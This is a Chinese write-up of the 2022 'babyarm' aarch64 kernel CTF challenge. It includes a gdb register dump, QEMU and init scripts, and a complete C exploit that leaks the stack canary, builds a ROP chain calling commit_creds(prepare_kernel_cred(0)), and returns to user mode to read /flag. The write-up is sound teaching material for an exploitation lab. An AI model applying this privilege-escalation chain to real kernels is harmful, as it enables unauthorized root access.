2022 CTF babyarm 内核题目详细分析

admin

101113
文章

87
评论

2022年5月4日20:28:32评论68 views字数 11311阅读37分42秒阅读模式

2022 CTF babyarm 内核题目详细分析

本文为看雪论坛优秀文章
看雪论坛作者ID：gxh1911

一

概述

一道不常见的 aarch64 kernel pwn，这题很简单就简单栈溢出，msr 返回用户态 orw 即可。

但就是返回用户态的机制不太好了解，然后流程控制也跟常规的 x86 那种有很大区别。

二

代码审计

device_read 函数：

device_write 函数：
2022 CTF babyarm 内核题目详细分析

存在栈溢出漏洞

审一下代码就可以知道，红色框框中的东西一定会进，read 用来 leak，write 用来 rop。

其实不怎么审代码，下好断点调试也可以知道进入哪里，vmlinux 从镜像中拉出来地址全是乱的。

gadgets 可以通过调试去找，直接在 gdb 里面找，还好这题 rop 不复杂，不然痛苦死了。但这个方法也不好，后面发现这个 aarch64 的 Image 文件可以直接 ida，但是只有偏移地址，但没关系。这题没开 kaslr，直接查内核基址再加上偏移就可以了。

# 查程序基址 各个节grep demo /proc/modulesgrep "0x" /sys/module/demo/sections/.* # 查 vmlinux 符号grep prepare_kernel_cred  /proc/kallsymsgrep commit_creds  /proc/kallsymsgrep _text /proc/kallsyms # vmlinux 内核基址

然后说说 aarch64 的一些简单的汇编指令和知识。

寻址格式，# 代表立即数

[sp, #0x10]      // 从 sp+0x10 的地方取值[sp, #0x10]!     // 从 sp+0x10 的地方取值，取完值后 sp+0x10[sp], #0x10      // 从 sp 的地方取值，取完值后 sp+0x10

寄存器

在 aarch64 汇编中寄存器是 64 位的，使用 X[n] 表示，低32 位以 W[n] 表示。

在 64 位架构中有 31 个 64 位的通用寄存器，使用如下指令在 pwndbg 中查看：

pwndbg> i regx0             0x0                 0x1             0x0                 0x2             0x8                 8x3             0x20                32x4             0xffffffffffffffe0  -32x5             0x40                64x6             0x3f                63x7             0x0                 0x8             0xffff000002eaebe8  -281474927760408x9             0x0                 0x10            0x0                 0x11            0x0                 0x12            0x438614            4425236x13            0x60001000          1610616832x14            0x1200011           18874385x15            0xdc                220x16            0x0                 0x17            0x0                 0x18            0xcfab              53163x19            0xffff000002ead100  -281474927767296x20            0xffff80000a2b3da0  -140737317749344x21            0x1200000           18874368x22            0x0                 0x23            0xffff80000a2b8000  -140737317732352x24            0xffff80000a2bbeb0  -140737317716304x25            0x0                 0x26            0xffff000002eae480  -281474927762304x27            0xffff80000a0417e0  -140737320314912x28            0xffff000002eade80  -281474927763840x29            0xffff80000a2b3bc0  -140737317749824x30            0xffff800008016950  -140737354045104sp             0xffff80000a2b3bc0  0xffff80000a2b3bc0pc             0xffff800008016958  0xffff800008016958cpsr           0x5                 5fpsr           0x0                 0fpcr           0x0                 0MVFR6_EL1_RESERVED 0x0             0MVFR7_EL1_RESERVED 0x0             0MAIR_EL3       0x0                 0ID_AA64PFR1_EL1 0x1                1ID_AA64PFR2_EL1_RESERVED 0x0       0ID_AA64PFR3_EL1_RESERVED 0x0       0SCTLR          0x200002034f4d91d   144115326403270941ID_AA64ZFR0_EL1 0x0                0CNTKCTL        0xc6                198DACR32_EL2     0x0                 0ID_AA64PFR5_EL1_RESERVED 0x0       0ACTLR_EL1      0x0                 0CPACR          0x300000            3145728ID_AA64PFR6_EL1_RESERVED 0x0       0FPEXC32_EL2    0x0                 0ID_AA64PFR7_EL1_RESERVED 0x0       0ID_AA64DFR0_EL1 0x10305106         271601926ID_AA64DFR1_EL1 0x0                0ID_AA64DFR2_EL1_RESERVED 0x0       0ID_AA64DFR3_EL1_RESERVED 0x0       0ID_AA64AFR0_EL1 0x0                0ID_AA64AFR1_EL1 0x0                0ID_AA64AFR2_EL1_RESERVED 0x0       0CNTFRQ_EL0     0x3b9aca0           62500000ID_AA64AFR3_EL1_RESERVED 0x0       0SPSR_EL1       0x60001000          1610616832ID_AA64ISAR0_EL1 0x1021111110212120 1162228943821021472DBGBVR         0x0                 0ELR_EL1        0x438614            4425236ID_AA64ISAR1_EL1 0x11101011010     1172542918672PMEVTYPER0_EL0 0x0                 0DBGBCR         0x0                 0ID_AA64ISAR2_EL1_RESERVED 0x0      0PMEVTYPER1_EL0 0x0                 0DBGWVR         0x0                 0ID_AA64ISAR3_EL1_RESERVED 0x0      0ZCR_EL1        0x0                 0DBGWCR         0x0                 0RVBAR_EL1      0x0                 0ID_AA64ISAR4_EL1_RESERVED 0x0      0PMEVTYPER2_EL0 0x0                 0PMEVTYPER3_EL0 0x0                 0MDCCSR_EL0     0x1000              4096ID_AA64ISAR5_EL1_RESERVED 0x0      0ID_AA64ISAR6_EL1_RESERVED 0x0      0ID_AA64ISAR7_EL1_RESERVED 0x0      0SP_EL0         0xffff000002ead100  -281474927767296ID_AA64MMFR0_EL1 0x1124            4388DBGBVR         0x0                 0ID_AA64MMFR1_EL1 0x11000           69632DBGBCR         0x0                 0ID_AA64MMFR2_EL1_RESERVED 0x0      0PMINTENSET_EL1 0x0                 0DBGWVR         0x0                 0ID_AA64MMFR3_EL1_RESERVED 0x0      0PMINTENCLR_EL1 0x0                 0DBGWCR         0x0                 0ID_AA64MMFR4_EL1_RESERVED 0x0      0PMCNTENSET_EL0 0x0                 0ACTLR_EL2      0x0                 0PMCR_EL0       0x2000              8192ID_AA64MMFR5_EL1_RESERVED 0x0      0PMCNTENCLR_EL0 0x0                 0VBAR           0xffff800008010800  -140737354070016ID_AA64MMFR6_EL1_RESERVED 0x0      0PMOVSCLR_EL0   0x0                 0MDSCR_EL1      0x1000              4096ID_AA64MMFR7_EL1_RESERVED 0x0      0CNTP_CTL_EL0   0x0                 0PMSELR_EL0     0x0                 0CNTP_CVAL_EL0  0x0                 0DBGBVR         0x0                 0DBGBCR         0x0                 0PMCEID1_EL0    0x0                 0PMCEID0_EL0    0x20001             131073DBGWVR         0x0                 0PMCCNTR_EL0    0x0                 0DBGWCR         0x0                 0L2ACTLR        0x0                 0TTBR0_EL1      0x42eca000          1122803712TTBR1_EL1      0x280000418b0000    11259000168054784CNTV_CTL_EL0   0x1                 1TCR_EL1        0x400034b5503510    18014624889713936DBGBVR         0x0                 0DBGBCR         0x0                 0ACTLR_EL3      0x0                 0CNTV_CVAL_EL0  0x2aff26ff          721364735DBGWVR         0x0                 0ZCR_EL2        0x0                 0PMUSERENR_EL0  0x0                 0DBGWCR         0x0                 0PMOVSSET_EL0   0x0                 0APIAKEYLO_EL1  0x0                 0APIAKEYHI_EL1  0x0                 0SP_EL1         0xffff80000a2b4000  -140737317748736MDRAR_EL1      0x0                 0APIBKEYLO_EL1  0x0                 0PMCCFILTR_EL0  0x0                 0DBGBVR         0x0                 0APIBKEYHI_EL1  0x0                 0DBGBCR         0x0                 0CPUACTLR_EL1   0x0                 0CPUECTLR_EL1   0x0                 0CONTEXTIDR_EL1 0x0                 0APDAKEYLO_EL1  0x0                 0APDAKEYHI_EL1  0x0                 0CNTPS_CTL_EL1  0x0                 0CPUMERRSR_EL1  0x0                 0CNTPS_CVAL_EL1 0x0                 0L2MERRSR_EL1   0x0                 0DBGBVR         0x0                 0APDBKEYLO_EL1  0x0                 0MAIR_EL1       0x40044ffff         17184391167APDBKEYHI_EL1  0x0                 0DBGBCR         0x0                 0TPIDR_EL1      0xffff80000673f000  -140737380093952AFSR0_EL1      0x0                 0OSLSR_EL1      0x8                 8AFSR1_EL1      0x0                 0PAR_EL1        0x0                 0CBAR_EL1       0x8000000           134217728APGAKEYLO_EL1  0x0                 0APGAKEYHI_EL1  0x0                 0SPSR_IRQ       0x0                 0MDCR_EL3       0x0                 0SPSR_ABT       0x0                 0AMAIR0         0x0                 0FPCR           0x0                 0SPSR_UND       0x0                 0SPSR_FIQ       0x0                 0FPSR           0x0                 0ESR_EL1        0x56000000          1442840576CLIDR          0xa200023           169869347REVIDR_EL1     0x0                 0ID_PFR0        0x131               305ID_DFR0        0x3010066           50397286ID_AFR0        0x0                 0ID_MMFR0       0x10101105          269488389CSSELR         0x0                 0LORSA_EL1      0x0                 0ID_MMFR1       0x40000000          1073741824AIDR           0x0                 0TPIDR_EL0      0x11439700          289642240LOREA_EL1      0x0                 0ID_MMFR2       0x1260000           19267584TPIDRRO_EL0    0x0                 0LORN_EL1       0x0                 0ID_MMFR3       0x2102211           34611729IFSR32_EL2     0x0                 0LORC_EL1       0x0                 0ID_ISAR0       0x2101110           34607376ID_ISAR1       0x13112111          319889681PMEVCNTR0_EL0  0x0                 0ID_ISAR2       0x21232042          555950146PMEVCNTR1_EL0  0x0                 0ID_ISAR3       0x1112131           17899825CTR_EL0        0x8444c004          2219098116LORID_EL1      0x0                 0PMEVCNTR2_EL0  0x0                 0ID_ISAR4       0x11142             69954PMEVCNTR3_EL0  0x0                 0ID_ISAR5       0x11011121          285282593ID_MMFR4       0x0                 0ID_ISAR6       0x11111             69905L2CTLR_EL1     0x0                 0MVFR0_EL1      0x10110222          269550114L2ECTLR_EL1    0x0                 0FAR_EL1        0xffffce1148b0      281474138982576MVFR1_EL1      0x12111111          303108369MVFR2_EL1      0x43                67MVFR3_EL1_RESERVED 0x0             0MVFR4_EL1_RESERVED 0x0             0MVFR5_EL1_RESERVED 0x0             0

x0~x7：一般是函数的参数，大于8个的会通过堆栈传参

x0 还用作返回值

X9-X15：调用者保存的临时寄存器

X19-X29：被调用者保存的寄存器

特殊用途寄存器：

X8：是间接结果寄存器，用于保存子程序返回地址
X16 和 X17：程序内调用临时寄存器
X18：平台寄存器
X29：帧指针寄存器（FP），类似 rsp
X30：链接寄存器（LR），一般存的是返回地址
X31：堆栈指针寄存器 SP 或零寄存器 ZXR

关于 aarch64 架构下的开辟栈帧：

x86 下一般是 push、pop 指令，而 aarch 64 下就是 LDP、STP 指令

例如：

STP             X29, X30, [SP,#var_40]!...LDP             X21, X22, [SP,#0x40+var_20]LDP             X29, X30, [SP+0x40+var_40],#0x40RET

STP 从 [SP,#var_40] 中取出值（两个八字节），放入 x29、x30
LDP 从 [SP,#0x40+var_20] 中取出值，同上。。。
LDP 从 [SP+0x40+var_40] 中取出值（两个八字节），放入 x29、x30，然后 sp + 0x40

关于返回用户态

使用 gdb 单步调试可以找到如下 gadgets，也就是利用 msr 指令进行寄存器的恢复。

// ret2_usr_mode ►  0xffff800008011fe4:    msr    sp_el0, x23......0xffff800008012024    msr    elr_el1, x210xffff800008012028    msr    spsr_el1, x220xffff80000801202c    ldp    x0, x1, [sp]0xffff800008012030    ldp    x2, x3, [sp, #0x10]0xffff800008012034    ldp    x4, x5, [sp, #0x20]0xffff800008012038    ldp    x6, x7, [sp, #0x30]0xffff80000801203c    ldp    x8, x9, [sp, #0x40]0xffff800008012040    ldp    x10, x11, [sp, #0x50]0xffff800008012044    ldp    x12, x13, [sp, #0x60]0xffff800008012048    ldp    x14, x15, [sp, #0x70]0xffff80000801204c    ldp    x16, x17, [sp, #0x80]

sp_el0：保存用户态的栈指针
elr_el1：保存要返回的用户态PC指针(一般写成 system即可)
spsr_el1：固定值 0x80001000

msr 指令会分别将 x21、x22、x23 的值还原给上面三个重要寄存器，所以伪造这三个值即可返回用户态。

三

利用

先改一下 init 文件：

#!/bin/sh
mount -t devtmpfs none /devmount -t proc none /procmount -t sysfs none /sys insmod /home/pwn/demo.kochown -R 1000:1000 /home/pwn echo 1 > /proc/sys/kernel/dmesg_restrictecho 1 > /proc/sys/kernel/kptr_restrictecho 1 > /proc/sys/kernel/perf_event_paranoidecho -e "nBoot took $(cut -d' ' -f1 /proc/uptime) secondsn" # cd /home/pwn# setsid cttyhack setuidgid 1000 sh# setsid cttyhack setuidgid 0 sh setsid /bin/cttyhack setuidgid 1000 /bin/sh# setsid /bin/cttyhack setuidgid 0 /bin/sh umount /proc poweroff -f

注释掉 cd /home/pwn，是为了运行 exp 更方便，不然还得 cd 一下才能运行 exp。

这两条指令

echo 1 > /proc/sys/kernel/dmesg_restrictecho 1 > /proc/sys/kernel/kptr_restrict

这使得普通用户无法查看 dmesg 和 kallsyms 中的值（kallsyms 中显示会全部为 0）。

主要影响的是查看与 moudle 相关的调试信息，也就是在 /sys/moudle/core/section 查看地址会受到限制。

还有就是会造成无法直接通过 /proc/kallsyms 来进行 leak kernel 基址，所以直接设置了 root 权限，方便本地调试，root 可以直接查看地址。

改动如下：

# cd /home/pwn# setsid cttyhack setuidgid 1000 sh# setsid cttyhack setuidgid 0 sh setsid /bin/cttyhack setuidgid 1000 /bin/sh# setsid /bin/cttyhack setuidgid 0 /bin/sh

启动脚本：

#!/bin/bash
# 编译 exp~/gcc-linaro-7.5.0-2019.12-x86_64_aarch64-linux-gnu/bin/aarch64-linux-gnu-gcc exp.c -static -o rootfs/exp # rootfs 打包pushd rootfsfind . | cpio -o --format=newc > ../initramfs.cpiopopdgzip initramfs.cpio # 启动 gdbgnome-terminal -e 'gdb-multiarch -x mygdbinit' # 启动 qemu# timeout --foreground 60 cnmdqemu-system-aarch64     -m 256M     -machine virt     -cpu max     -kernel ./Image     -append "console=ttyAMA0 loglevel=3 oops=panic panic=1"     -initrd ./initramfs.cpio.gz     -monitor /dev/null     -smp cores=1,threads=1     -nographic     -s

我把下面这条注释了，不然调试一段时间会自动退出：

  timeout --foreground 60 cnmd

编译的话，先要装个工具链：

https://releases.linaro.org/components/toolchain/binaries/latest-7/aarch64-linux-gnu/

这个网站下载压缩包即可。

交叉编译 aarch64

  ~/gcc-linaro-7.5.0-2019.12-x86_64_aarch64-linux-gnu/bin/aarch64-linux-gnu-gcc exp.c -static -o rootfs/exp

或者是直接装交叉编译环境

sudo apt-get install emdebian-archive-keyringsudo apt-get install linux-libc-dev-arm64-cross libc6-arm64-crosssudo apt-get install binutils-aarch64-linux-gnu gcc-8-aarch64-linux-gnusudo apt-get install g++-8-aarch64-linux-gnu aarch64-linux-gnu-gcc-8 -static exp.c -o rootfs/exp

利用思路：

read 函数 leak canary
write 函数写入 rop

先是内核空间执行 commit_creds(prepare_kernel_cred(0) 提权
然后返回用户态使用 orw 读取 flag（system 好像不行）

根据 aarch64 的特点，我们需要控制 x30(返回地址)，x0(第一个参数)，然后 ret 即可，ret 不会改变 sp，这跟 x86 也是不一样的。

我用到的三个 gadgets

.text:0000000000014F50                 MOV             W0, #0.text:0000000000014F54                 LDP             X19, X20, [SP,#var_s10].text:0000000000014F58                 LDP             X21, X22, [SP,#var_s20].text:0000000000014F5C                 LDP             X29, X30, [SP+var_s0],#0x30.text:0000000000014F60                 RET .text:0000000000016958                 LDP             X21, X22, [SP,#0x50+var_30].text:000000000001695C                 LDP             X23, X24, [SP,#0x50+var_20].text:0000000000016960                 LDR             X25, [SP,#0x50+var_10].text:0000000000016964                 LDP             X29, X30, [SP+0x50+var_50],#0x50.text:0000000000016968                 RET // ret2_usr_mode►  0xffff800008011fe4:    msr    sp_el0, x23......0xffff800008012024    msr    elr_el1, x210xffff800008012028    msr    spsr_el1, x220xffff80000801202c    ldp    x0, x1, [sp]0xffff800008012030    ldp    x2, x3, [sp, #0x10]0xffff800008012034    ldp    x4, x5, [sp, #0x20]0xffff800008012038    ldp    x6, x7, [sp, #0x30]0xffff80000801203c    ldp    x8, x9, [sp, #0x40]0xffff800008012040    ldp    x10, x11, [sp, #0x50]0xffff800008012044    ldp    x12, x13, [sp, #0x60]0xffff800008012048    ldp    x14, x15, [sp, #0x70]0xffff80000801204c    ldp    x16, x17, [sp, #0x80]

因为 x0 寄存器用作第一个参数，所以找了个有 MOV W0, #0 的 gadgets，w0 只是 X0的低三十二位，因为高三十二位本来就是 0。

然后 commit_creds 和 prepare_kernel_cred 的地址都加了四，为了跳过 stp 指令对 x30 寄存器的修改，也就是下面这条。

STP             X29, X30, [SP,#-0x20+var_s0]!

这样才方便我们伪造 x30 方便后续 rop 的利用。

构造 rop 的时候，要注意 sp 的变化，建议是多写一些 0xaaaaaaaaaaaaaaaa 这样的数据进去，方便调试，调试完再做替换即可，还有就是可以直接写 0xaaaaaaaa...0xbbbbbb...，这样的东西，写多一些。

然后看错误回显，看看执行了哪个地址，比如错误回显提示 call：0xaaaaaaaaaaaaaaaa，那就可以将 0xaaaaaaaaaaaaaaaa 替换为我们要执行的地址，这样很快很方便。

exp

#include <stdio.h>#include <string.h>#include <fcntl.h> //open#include <stdlib.h> //size_t#include <sys/stat.h>#include <fcntl.h> #define prepare_kernel_cred_addr    0xffff8000080a24f8#define commit_creds_addr           0xffff8000080a2258#define vmlinux_base_addr           0xffff800008000000#define elf_base           0xffff800000e40000#define ret2_user_mode           0xffff800008011fe4 void get_shell() {    printf("[+] got shell, welcome %sn", (getuid() ? "user" : "root"));    // system("/bin/sh");    char buf[0x50] = {0};    int fd = open("/flag",0);    read(fd, buf, 0x50);    write(1, buf, 0x50);} int main() {    int fd = open("/proc/demo", O_RDWR);    size_t mem[0x200];    memset(mem, 'x00', sizeof(mem));    read(fd, mem, 128+8);    size_t canary = mem[16];    printf("[+] canary = %pn", canary);     // write    memset(mem, 'x00', sizeof(mem));    memset(mem, 'a', 0x80);    mem[16] = canary;    mem[17] = 0xaaaaaaaaaaaaaaaa;     // mem[18] = 0xbbbbbbbbbbbbbbbb;    mem[18] = vmlinux_base_addr+0x14F50;     mem[19] = 0xcccccccccccccccc;    mem[20] = 0xdddddddddddddddd;    mem[21] = 0xeeeeeeeeeeeeeeee;     // mem[22] = 0xffffffffffffffff;    mem[22] = prepare_kernel_cred_addr+4;     // mem[23] = commit_creds_addr+4;    mem[23] = 0xaaaaaaaaaaaaaaaa;    mem[24] = 0xccccccccdddddddd;    mem[25] = 0xeeeeeeeeffffffff;    mem[26] = 0xaaaaaaaabbbbbbbb;    mem[27] = 0xccccccccdddddddd;     // mem[28] = vmlinux_base_addr+0x14F5C;    mem[28] = commit_creds_addr+4;     // mem[29] = 0xaaaaaaaaaaaaaaaa;    // mem[30] = 0xbbbbbbbbbbbbbbbb;    mem[31] = 0xcccccccccccccccc;     mem[32] = vmlinux_base_addr+0x16958;     mem[33] = 0xaaaaaaaaaaaaaaaa;    mem[34] = 0xbbbbbbbbbbbbbbbb;    mem[35] = 0xcccccccccccccccc;    mem[35] = 0xdddddddddddddddd;     mem[36] = 0xccccccccdddddddd;    mem[37] = 0xeeeeeeeeffffffff;    mem[38] = ret2_user_mode;    mem[39] = 0xccccccccdddddddd;     mem[40] = 0xaaaaaaaabbbbbbbb;    mem[41] = (size_t)get_shell;    mem[42] = 0x80001000;    mem[43] = (size_t)mem;     write(fd,mem,0x200);    close(fd);}